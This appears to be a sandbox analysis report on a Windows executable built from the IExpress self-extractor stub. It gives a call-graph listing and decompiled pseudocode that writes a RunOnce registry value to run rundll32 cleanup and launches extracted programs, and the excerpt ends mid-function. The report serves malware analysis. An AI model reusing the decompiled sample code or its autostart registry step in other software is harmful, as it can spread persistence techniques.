2952->2945 2954 e7658a CharPrevA 2953->2954 2955 e7211b LoadLibraryA 2954->2955 2956 e7212e GetProcAddress FreeLibrary 2955->2956 2957 e72179 GetModuleFileNameA 2955->2957 2956->2957 2958 e7214e GetSystemDirectoryA 2956->2958 2959 e721de RegCloseKey 2957->2959 2962 e72177 2957->2962 2960 e72165 2958->2960 2958->2962 2959->2945 2961 e7658a CharPrevA 2960->2961 2961->2962 2962->2962 2963 e721b7 LocalAlloc 2962->2963 2964 e721cd 2963->2964 2965 e721ec 2963->2965 2966 e744b9 20 API calls 2964->2966 2967 e7171e _vsnprintf 2965->2967 2966->2959 2968 e72218 RegSetValueExA RegCloseKey LocalFree 2967->2968 2968->2945 2971 e74016 CreateProcessA 2970->2971 2972 e74106 2970->2972 2973 e740c4 2971->2973 2974 e74041 WaitForSingleObject GetExitCodeProcess 2971->2974 2975 e76ce0 4 API calls 2972->2975 2978 e76285 GetLastError 2973->2978 2976 e74070 2974->2976 2977 e74117 2975->2977 3041 e7411b 2976->3041 2977->2677 2980 e740c9 GetLastError FormatMessageA 2978->2980 2982 e744b9 20 API calls 2980->2982 2981 e74096 CloseHandle CloseHandle 2981->2972 2983 e740ba 2981->2983 2982->2972 2983->2972 2985 e764c2 2984->2985 2986 e7658a CharPrevA 2985->2986 2987 e764d8 GetFileAttributesA 2986->2987 2988 e76501 LoadLibraryA 2987->2988 2989 e764ea 2987->2989 2991 e76508 2988->2991 2989->2988 2990 e764ee LoadLibraryExA 2989->2990 2990->2991 2992 e76ce0 4 API calls 2991->2992 2993 e76513 2992->2993 2993->2695 2995 e72381 2994->2995 2996 e72289 RegOpenKeyExA 2994->2996 2998 e76ce0 4 API calls 2995->2998 2996->2995 2997 e722b1 RegQueryValueExA 2996->2997 3000 e722e6 memset GetSystemDirectoryA 2997->3000 3001 e72374 RegCloseKey 2997->3001 2999 e7238c 2998->2999 2999->2673 3002 e72321 3000->3002 3003 e7230f 3000->3003 3001->2995 3005 e7171e _vsnprintf 3002->3005 3004 e7658a CharPrevA 3003->3004 3004->3002 3006 e7233f RegSetValueExA 3005->3006 3006->3001 3009 e71a9a 3008->3009 3011 e71aba 3009->3011 3013 e71aaf 3009->3013 3027 e7667f 3009->3027 3011->2906 3012 e7667f 2 API calls 3012->3013 3013->3011 
3013->3012 3015 e72ad4 GetModuleFileNameA 3014->3015 3016 e72be6 3014->3016 3026 e72b02 3015->3026 3017 e76ce0 4 API calls 3016->3017 3019 e72bf5 3017->3019 3018 e72af1 IsDBCSLeadByte 3018->3026 3019->2926 3020 e72b11 CharNextA CharUpperA 3022 e72b8d CharUpperA 3020->3022 3020->3026 3021 e72bca CharNextA 3023 e72bd3 CharNextA 3021->3023 3022->3026 3023->3026 3025 e72b43 CharPrevA 3025->3026 3026->3016 3026->3018 3026->3020 3026->3021 3026->3023 3026->3025 3032 e765e8 3026->3032 3030 e76689 3027->3030 3028 e76648 IsDBCSLeadByte 3028->3030 3029 e766a5 3029->3009 3030->3028 3030->3029 3031 e76697 CharNextA 3030->3031 3031->3030 3033 e765f4 3032->3033 3033->3033 3034 e765fb CharPrevA 3033->3034 3035 e76611 CharPrevA 3034->3035 3036 e7661e 3035->3036 3037 e7660b 3035->3037 3038 e7663d 3036->3038 3039 e76627 CharPrevA 3036->3039 3040 e76634 CharNextA 3036->3040 3037->3035 3037->3036 3038->3026 3039->3038 3039->3040 3040->3038 3042 e74132 3041->3042 3044 e7412a 3041->3044 3045 e71ea7 3042->3045 3044->2981 3046 e71eba 3045->3046 3047 e71ed3 3045->3047 3048 e7256d 15 API calls 3046->3048 3047->3044 3048->3047 3050 e72026 3049->3050 3051 e71ff0 RegOpenKeyExA 3049->3051 3050->2320 3051->3050 3052 e7200f RegDeleteValueA RegCloseKey 3051->3052 3052->3050 3053 e74ca0 GlobalAlloc 3119 e719e0 3120 e71a24 GetDesktopWindow 3119->3120 3121 e71a03 3119->3121 3128 e743d0 6 API calls 3120->3128 3122 e71a20 3121->3122 3124 e71a16 EndDialog 3121->3124 3126 e76ce0 4 API calls 3122->3126 3124->3122 3127 e71a7e 3126->3127 3130 e74463 SetWindowPos 3128->3130 3131 e76ce0 4 API calls 3130->3131 3132 e71a33 LoadStringA SetDlgItemTextA MessageBeep 3131->3132 3132->3122 3133 e76a20 __getmainargs 3134 e76bef _XcptFilter 3135 e76ef0 3136 e76f02 3135->3136 3137 e76f2d 3135->3137 3136->3137 3138 e76f27 ?terminate@ 3136->3138 3138->3137 3139 e734f0 3140 e73504 3139->3140 3141 e735b8 3139->3141 3140->3141 3142 e735be GetDesktopWindow 3140->3142 3143 e7351b 3140->3143 3144 e73671 EndDialog 3141->3144 
3150 e73526 3141->3150 3145 e743d0 11 API calls 3142->3145 3146 e7354f 3143->3146 3147 e7351f 3143->3147 3144->3150 3149 e735d6 3145->3149 3148 e73559 ResetEvent 3146->3148 3146->3150 3147->3150 3151 e7352d TerminateThread EndDialog 3147->3151 3152 e744b9 20 API calls 3148->3152 3153 e735e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3149->3153 3154 e7361d SetWindowTextA CreateThread 3149->3154 3151->3150 3155 e73581 3152->3155 3153->3154 3154->3150 3156 e73646 3154->3156 3157 e7359b SetEvent 3155->3157 3159 e7358a SetEvent 3155->3159 3158 e744b9 20 API calls 3156->3158 3160 e73680 4 API calls 3157->3160 3158->3141 3159->3150 3160->3141 3161 e769b0 3162 e769b5 3161->3162 3170 e76fbe GetModuleHandleW 3162->3170 3164 e769c1 __set_app_type __p__fmode __p__commode 3165 e769f9 3164->3165 3166 e76a02 __setusermatherr 3165->3166 3167 e76a0e 3165->3167 3166->3167 3172 e771ef _controlfp 3167->3172 3169 e76a13 3171 e76fcf 3170->3171 3171->3164 3172->3169 3173 e77270 _except_handler4_common 3174 e76c03 3175 e76c17 _exit 3174->3175 3176 e76c1e 3174->3176 3175->3176 3177 e76c27 _cexit 3176->3177 3178 e76c32 3176->3178 3177->3178 3054 e74cc0 GlobalFree 3055 e76f40 SetUnhandledExceptionFilter 3179 e74bc0 3181 e74c05 3179->3181 3182 e74bd7 3179->3182 3180 e74c1b SetFilePointer 3180->3182 3181->3180 3181->3182 3183 e730c0 3184 e730de CallWindowProcA 3183->3184 3185 e730ce 3183->3185 3186 e730da 3184->3186 3185->3184 3185->3186 3187 e763c0 3188 e76407 3187->3188 3189 e7658a CharPrevA 3188->3189 3190 e76415 CreateFileA 3189->3190 3191 e7643a 3190->3191 3192 e76448 WriteFile 3190->3192 3195 e76ce0 4 API calls 3191->3195 3193 e76465 CloseHandle 3192->3193 3193->3191 3196 e7648f 3195->3196 3197 e73100 3198 e731b0 3197->3198 3201 e73111 3197->3201 3199 e73141 3198->3199 3200 e731b9 SendDlgItemMessageA 3198->3200 3200->3199 3202 e7311d 3201->3202 3203 e73149 GetDesktopWindow 3201->3203 3202->3199 3204 e73138 EndDialog 3202->3204 3205 e743d0 11 API calls 3203->3205 3204->3199 3206 
e7315d 6 API calls 3205->3206 3206->3199 3207 e74200 3208 e7421e 3207->3208 3209 e7420b SendMessageA 3207->3209 3209->3208 3056 e74cd0 3057 e74cf4 3056->3057 3058 e74d0b 3056->3058 3059 e74d02 3057->3059 3060 e74b60 FindCloseChangeNotification 3057->3060 3058->3059 3062 e74dcb 3058->3062 3065 e74d25 3058->3065 3061 e76ce0 4 API calls 3059->3061 3060->3059 3064 e74e95 3061->3064 3063 e74dd4 SetDlgItemTextA 3062->3063 3066 e74de3 3062->3066 3063->3066 3065->3059 3079 e74c37 3065->3079 3066->3059 3084 e7476d 3066->3084 3070 e74e38 3070->3059 3072 e74980 25 API calls 3070->3072 3071 e74b60 FindCloseChangeNotification 3073 e74d99 SetFileAttributesA 3071->3073 3074 e74e56 3072->3074 3073->3059 3074->3059 3075 e74e64 3074->3075 3093 e747e0 LocalAlloc 3075->3093 3078 e74e6f 3078->3059 3080 e74c88 3079->3080 3081 e74c4c DosDateTimeToFileTime 3079->3081 3080->3059 3080->3071 3081->3080 3082 e74c5e LocalFileTimeToFileTime 3081->3082 3082->3080 3083 e74c70 SetFileTime 3082->3083 3083->3080 3102 e766ae GetFileAttributesA 3084->3102 3086 e7477b 3086->3070 3087 e747cc SetFileAttributesA 3089 e747db 3087->3089 3089->3070 3090 e76517 24 API calls 3091 e747b1 3090->3091 3091->3087 3091->3089 3092 e747c2 3091->3092 3092->3087 3094 e747f6 3093->3094 3095 e7480f LocalAlloc 3093->3095 3096 e744b9 20 API calls 3094->3096 3098 e74831 3095->3098 3101 e7480b 3095->3101 3096->3101 3099 e744b9 20 API calls 3098->3099 3100 e74846 LocalFree 3099->3100 3100->3101 3101->3078 3103 e74777 3102->3103 3103->3086 3103->3087 3103->3090 3104 e74ad0 3112 e73680 3104->3112 3107 e74aee WriteFile 3109 e74b14 3107->3109 3110 e74b0f 3107->3110 3108 e74ae9 3109->3110 3111 e74b3b SendDlgItemMessageA 3109->3111 3111->3110 3113 e73691 MsgWaitForMultipleObjects 3112->3113 3114 e736a9 PeekMessageA 3113->3114 3115 e736e8 3113->3115 3114->3113 3116 e736bc 3114->3116 3115->3107 3115->3108 3116->3113 3116->3115 3117 e736c7 DispatchMessageA 3116->3117 3118 e736d1 PeekMessageA 3116->3118 3117->3118 3118->3116 3210 e74a50 
3211 e74a66 3210->3211 3212 e74a9f ReadFile 3210->3212 3213 e74abb 3211->3213 3214 e74a82 memcpy 3211->3214 3212->3213 3214->3213 3215 e73450 3216 e734d3 EndDialog 3215->3216 3217 e7345e 3215->3217 3220 e7346a 3216->3220 3218 e7349a GetDesktopWindow 3217->3218 3223 e73465 3217->3223 3219 e743d0 11 API calls 3218->3219 3221 e734ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3219->3221 3221->3220 3222 e7348c EndDialog 3222->3220 3223->3220 3223->3222 3224 e73210 3225 e73227 3224->3225 3250 e7328e EndDialog 3224->3250 3226 e73235 3225->3226 3227 e733e2 GetDesktopWindow 3225->3227 3230 e73239 3226->3230 3232 e732dd GetDlgItemTextA 3226->3232 3233 e7324c 3226->3233 3229 e743d0 11 API calls 3227->3229 3231 e733f1 SetWindowTextA SendDlgItemMessageA 3229->3231 3231->3230 3234 e7341f GetDlgItem EnableWindow 3231->3234 3237 e73366 3232->3237 3245 e732fc 3232->3245 3235 e732c5 EndDialog 3233->3235 3236 e73251 3233->3236 3234->3230 3235->3230 3236->3230 3238 e7325c LoadStringA 3236->3238 3239 e744b9 20 API calls 3237->3239 3240 e73294 3238->3240 3241 e7327b 3238->3241 3239->3230 3262 e74224 LoadLibraryA 3240->3262 3246 e744b9 20 API calls 3241->3246 3244 e73331 GetFileAttributesA 3248 e7333f 3244->3248 3249 e7337c 3244->3249 3245->3237 3245->3244 3246->3250 3247 e732a5 SetDlgItemTextA 3247->3230 3247->3241 3252 e744b9 20 API calls 3248->3252 3251 e7658a CharPrevA 3249->3251 3250->3230 3253 e7338d 3251->3253 3254 e73351 3252->3254 3255 e758c8 27 API calls 3253->3255 3254->3230 3256 e7335a CreateDirectoryA 3254->3256 3257 e73394 3255->3257 3256->3237 3256->3249 3257->3237 3258 e733a4 3257->3258 3259 e733c7 EndDialog 3258->3259 3260 e7597d 34 API calls 3258->3260 3259->3230 3261 e733c3 3260->3261 3261->3230 3261->3259 3263 e74246 GetProcAddress 3262->3263 3264 e743b2 3262->3264 3265 e743a4 FreeLibrary 3263->3265 3266 e7425d GetProcAddress 3263->3266 3268 e744b9 20 API calls 3264->3268 3265->3264 3266->3265 3267 e74274 GetProcAddress 3266->3267 3267->3265 3270 e7428b 
3267->3270 3269 e7329d 3268->3269 3269->3230 3269->3247 3271 e742e1 3270->3271 3272 e74295 GetTempPathA 3270->3272 3276 e74390 FreeLibrary 3271->3276 3273 e742ad 3272->3273 3273->3273 3274 e742b4 CharPrevA 3273->3274 3274->3271 3275 e742d0 CharPrevA 3274->3275 3275->3271 3276->3269

Callgraph

[Figure: callgraph of the sample's functions. Legend: Executed; Not Executed; Opacity -> Relevance; Disassembly available.]

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00E7202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v528;
                                                                                                                                                                                                      				void* _v532;
                                                                                                                                                                                                      				int _v536;
                                                                                                                                                                                                      				int _v540;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                                      				long _t41;
                                                                                                                                                                                                      				struct HINSTANCE__* _t46;
                                                                                                                                                                                                      				intOrPtr _t49;
                                                                                                                                                                                                      				intOrPtr _t50;
                                                                                                                                                                                                      				CHAR* _t54;
                                                                                                                                                                                                      				void _t56;
                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                      				intOrPtr* _t72;
                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                      				void* _t75;
                                                                                                                                                                                                      				void* _t80;
                                                                                                                                                                                                      				intOrPtr* _t81;
                                                                                                                                                                                                      				void* _t86;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				void* _t90;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                      				signed int _t93;
                                                                                                                                                                                                      				void* _t94;
                                                                                                                                                                                                      				void* _t95;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t79 = __edx;
                                                                                                                                                                                                      				_t28 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                      				_t84 = 0x104;
                                                                                                                                                                                                      				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                      				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                      				_t95 = _t94 + 0x18;
                                                                                                                                                                                                      				_t66 = 0;
                                                                                                                                                                                                      				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                      				if(_t36 != 0) {
                                                                                                                                                                                                      					L24:
                                                                                                                                                                                                      					return E00E76CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(_t86);
                                                                                                                                                                                                      				_t87 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					E00E7171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                      					_t95 = _t95 + 0x10;
                                                                                                                                                                                                      					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                      					if(_t41 != 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t87 = _t87 + 1;
                                                                                                                                                                                                      					if(_t87 < 0xc8) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					break;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t87 != 0xc8) {
                                                                                                                                                                                                      					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                      					_t79 = _t84;
                                                                                                                                                                                                      					E00E7658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                      					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                      					_t84 = _t46;
                                                                                                                                                                                                      					if(_t84 == 0) {
                                                                                                                                                                                                      						L10:
                                                                                                                                                                                                      						if(GetModuleFileNameA( *0xe79a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      							L17:
                                                                                                                                                                                                      							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                      							L23:
                                                                                                                                                                                                      							_pop(_t86);
                                                                                                                                                                                                      							goto L24;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						_t72 =  &_v268;
                                                                                                                                                                                                      						_t80 = _t72 + 1;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t49 =  *_t72;
                                                                                                                                                                                                      							_t72 = _t72 + 1;
                                                                                                                                                                                                      						} while (_t49 != 0);
                                                                                                                                                                                                      						_t73 = _t72 - _t80;
                                                                                                                                                                                                      						_t81 = 0xe791e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t50 =  *_t81;
                                                                                                                                                                                                      							_t81 = _t81 + 1;
                                                                                                                                                                                                      						} while (_t50 != 0);
                                                                                                                                                                                                      						_t84 = _t73 + 0x50 + _t81 - 0xe791e5;
                                                                                                                                                                                                      						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xe791e5);
                                                                                                                                                                                                      						if(_t90 != 0) {
                                                                                                                                                                                                      							 *0xe78580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                      							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                      							if(_t66 == 0) {
                                                                                                                                                                                                      								_t54 = "%s /D:%s";
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                      							E00E7171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                      							_t75 = _t90;
                                                                                                                                                                                                      							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                      							_t79 = _t23;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t56 =  *_t75;
                                                                                                                                                                                                      								_t75 = _t75 + 1;
                                                                                                                                                                                                      							} while (_t56 != 0);
                                                                                                                                                                                                      							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                      							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                      							RegCloseKey(_v532); // executed
                                                                                                                                                                                                      							_t36 = LocalFree(_t90);
                                                                                                                                                                                                      							goto L23;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t79 = 0x4b5;
                                                                                                                                                                                                      						E00E744B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                      					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                      					FreeLibrary(_t84); // executed
                                                                                                                                                                                                      					if(_t91 == 0) {
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      						E00E7658A( &_v268, 0x104, 0xe71140);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                      				 *0xe78530 = _t66;
                                                                                                                                                                                                      				goto L23;
                                                                                                                                                                                                      			}

































                                                                                                                                                                                                      0x00e72196
                                                                                                                                                                                                      0x00e72196
                                                                                                                                                                                                      0x00e7219c
                                                                                                                                                                                                      0x00e7219f
                                                                                                                                                                                                      0x00e7219f
                                                                                                                                                                                                      0x00e721a1
                                                                                                                                                                                                      0x00e721a2
                                                                                                                                                                                                      0x00e721a6
                                                                                                                                                                                                      0x00e721a8
                                                                                                                                                                                                      0x00e721b0
                                                                                                                                                                                                      0x00e721b0
                                                                                                                                                                                                      0x00e721b2
                                                                                                                                                                                                      0x00e721b3
                                                                                                                                                                                                      0x00e721bc
                                                                                                                                                                                                      0x00e721c7
                                                                                                                                                                                                      0x00e721cb
                                                                                                                                                                                                      0x00e721f1
                                                                                                                                                                                                      0x00e721f6
                                                                                                                                                                                                      0x00e721fd
                                                                                                                                                                                                      0x00e721ff
                                                                                                                                                                                                      0x00e721ff
                                                                                                                                                                                                      0x00e72204
                                                                                                                                                                                                      0x00e72213
                                                                                                                                                                                                      0x00e72218
                                                                                                                                                                                                      0x00e7221d
                                                                                                                                                                                                      0x00e7221d
                                                                                                                                                                                                      0x00e72220
                                                                                                                                                                                                      0x00e72220
                                                                                                                                                                                                      0x00e72222
                                                                                                                                                                                                      0x00e72223
                                                                                                                                                                                                      0x00e72229
                                                                                                                                                                                                      0x00e7223d
                                                                                                                                                                                                      0x00e72249
                                                                                                                                                                                                      0x00e72250
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72250
                                                                                                                                                                                                      0x00e721d2
                                                                                                                                                                                                      0x00e721d9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e721d9
                                                                                                                                                                                                      0x00e7213a
                                                                                                                                                                                                      0x00e72141
                                                                                                                                                                                                      0x00e72144
                                                                                                                                                                                                      0x00e7214c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72163
                                                                                                                                                                                                      0x00e72172
                                                                                                                                                                                                      0x00e72172
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72163
                                                                                                                                                                                                      0x00e720ea
                                                                                                                                                                                                      0x00e720f0
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 00E72050
                                                                                                                                                                                                      • memset.MSVCRT ref: 00E7205F
                                                                                                                                                                                                      • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00E7208C
                                                                                                                                                                                                        • Part of subcall function 00E7171E: _vsnprintf.MSVCRT ref: 00E71750
                                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E720C9
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E720EA
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00E72103
                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E72122
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00E72134
                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E72144
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00E7215B
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E7218C
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E721C1
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E721E4
                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00E7223D
                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E72249
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E72250
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                      • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                      • API String ID: 178549006-1709460465
                                                                                                                                                                                                      • Opcode ID: 31cc90447172295668017fd6e375b20487f84435f61522bcba517c51f5cfe708
                                                                                                                                                                                                      • Instruction ID: d33b024d653f3664c3ed34da820367d345574646bf54d920466c195dc2d03c08
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31cc90447172295668017fd6e375b20487f84435f61522bcba517c51f5cfe708
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72511471A41214AFDB20DB25DC4DFFA776CEB90704F0491A8FA4DF6191EA708E898B60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E00E73BA2() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v280;
                                                                                                                                                                                                      				short _v300;
                                                                                                                                                                                                      				intOrPtr _v304;
                                                                                                                                                                                                      				void _v348;
                                                                                                                                                                                                      				char _v352;
                                                                                                                                                                                                      				intOrPtr _v356;
                                                                                                                                                                                                      				signed int _v360;
                                                                                                                                                                                                      				short _v364;
                                                                                                                                                                                                      				char* _v368;
intOrPtr _v372;
void* _v376;
intOrPtr _v380;
char _v384;
signed int _v388;
intOrPtr _v392;
signed int _v396;
signed int _v400;
signed int _v404;
void* _v408;
void* _v424;
void* __ebx;
void* __edi;
void* __esi;
signed int _t69;
signed int _t76;
void* _t77;
signed int _t79;
short _t96;
signed int _t97;
intOrPtr _t98;
signed int _t101;
signed int _t104;
signed int _t108;
int _t112;
void* _t115;
signed char _t118;
void* _t125;
signed int _t127;
void* _t128;
struct HINSTANCE__* _t129;
void* _t130;
short _t137;
char* _t140;
signed char _t144;
signed char _t145;
signed int _t149;
void* _t150;
void* _t151;
signed int _t153;
void* _t155;
void* _t156;
signed int _t157;
signed int _t162;
signed int _t164;
void* _t165;

_t164 = (_t162 & 0xfffffff8) - 0x194;
_t69 =  *0xe78004; // 0xd47724e2
_v8 = _t69 ^ _t164;
_t153 = 0;
 *0xe79124 =  *0xe79124 & 0;
_t149 = 0;
_v388 = 0;
_v384 = 0;
_t165 =  *0xe78a28 - _t153; // 0x0
if(_t165 != 0) {
	L3:
	_t127 = 0;
	_v392 = 0;
	while(1) {
		_v400 = _v400 & 0x00000000;
		memset( &_v348, 0, 0x44);
		_t164 = _t164 + 0xc;
		_v348 = 0x44;
		if( *0xe78c42 != 0) {
			goto L26;
		}
		_t146 =  &_v396;
		_t115 = E00E7468F("SHOWWINDOW",  &_v396, 4);
		if(_t115 == 0 || _t115 > 4) {
			L25:
			_t146 = 0x4b1;
			E00E744B9(0, 0x4b1, 0, 0, 0x10, 0);
			 *0xe79124 = 0x80070714;
			goto L62;
		} else {
			if(_v396 != 1) {
				__eflags = _v396 - 2;
				if(_v396 != 2) {
					_t137 = 3;
					__eflags = _v396 - _t137;
					if(_v396 == _t137) {
						_v304 = 1;
						_v300 = _t137;
					}
					goto L14;
				}
				_push(6);
				_v304 = 1;
				_pop(0);
				goto L11;
			} else {
				_v304 = 1;
				L11:
				_v300 = 0;
				L14:
				if(_t127 != 0) {
					L27:
					_t155 = 1;
					__eflags = _t127 - 1;
					if(_t127 != 1) {
						L31:
						_t132 =  &_v280;
						_t76 = E00E71AE8( &_v280,  &_v408,  &_v404); // executed
						__eflags = _t76;
						if(_t76 == 0) {
							L62:
							_t77 = 0;
							L63:
							_pop(_t150);
							_pop(_t156);
							_pop(_t128);
							return E00E76CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
						}
						_t157 = _v404;
						__eflags = _t149;
						if(_t149 != 0) {
							L37:
							__eflags = _t157;
							if(_t157 == 0) {
								L57:
								_t151 = _v408;
								_t146 =  &_v352;
								_t130 = _t151; // executed
								_t79 = E00E73FEF(_t130,  &_v352); // executed
								__eflags = _t79;
								if(_t79 == 0) {
									L61:
									LocalFree(_t151);
									goto L62;
								}
								L58:
								LocalFree(_t151);
								_t127 = _t127 + 1;
								_v396 = _t127;
								__eflags = _t127 - 2;
								if(_t127 >= 2) {
									_t155 = 1;
									__eflags = 1;
									L69:
									__eflags =  *0xe78580;
									if( *0xe78580 != 0) {
										E00E72267();
									}
									_t77 = _t155;
									goto L63;
								}
								_t153 = _v392;
								_t149 = _v388;
								continue;
							}
							L38:
							__eflags =  *0xe78180;
							if( *0xe78180 == 0) {
								_t146 = 0x4c7;
								E00E744B9(0, 0x4c7, 0, 0, 0x10, 0);
								LocalFree(_v424);
								 *0xe79124 = 0x8007042b;
								goto L62;
							}
							__eflags = _t157;
							if(_t157 == 0) {
								goto L57;
                                                                                                                                                                                                      											}
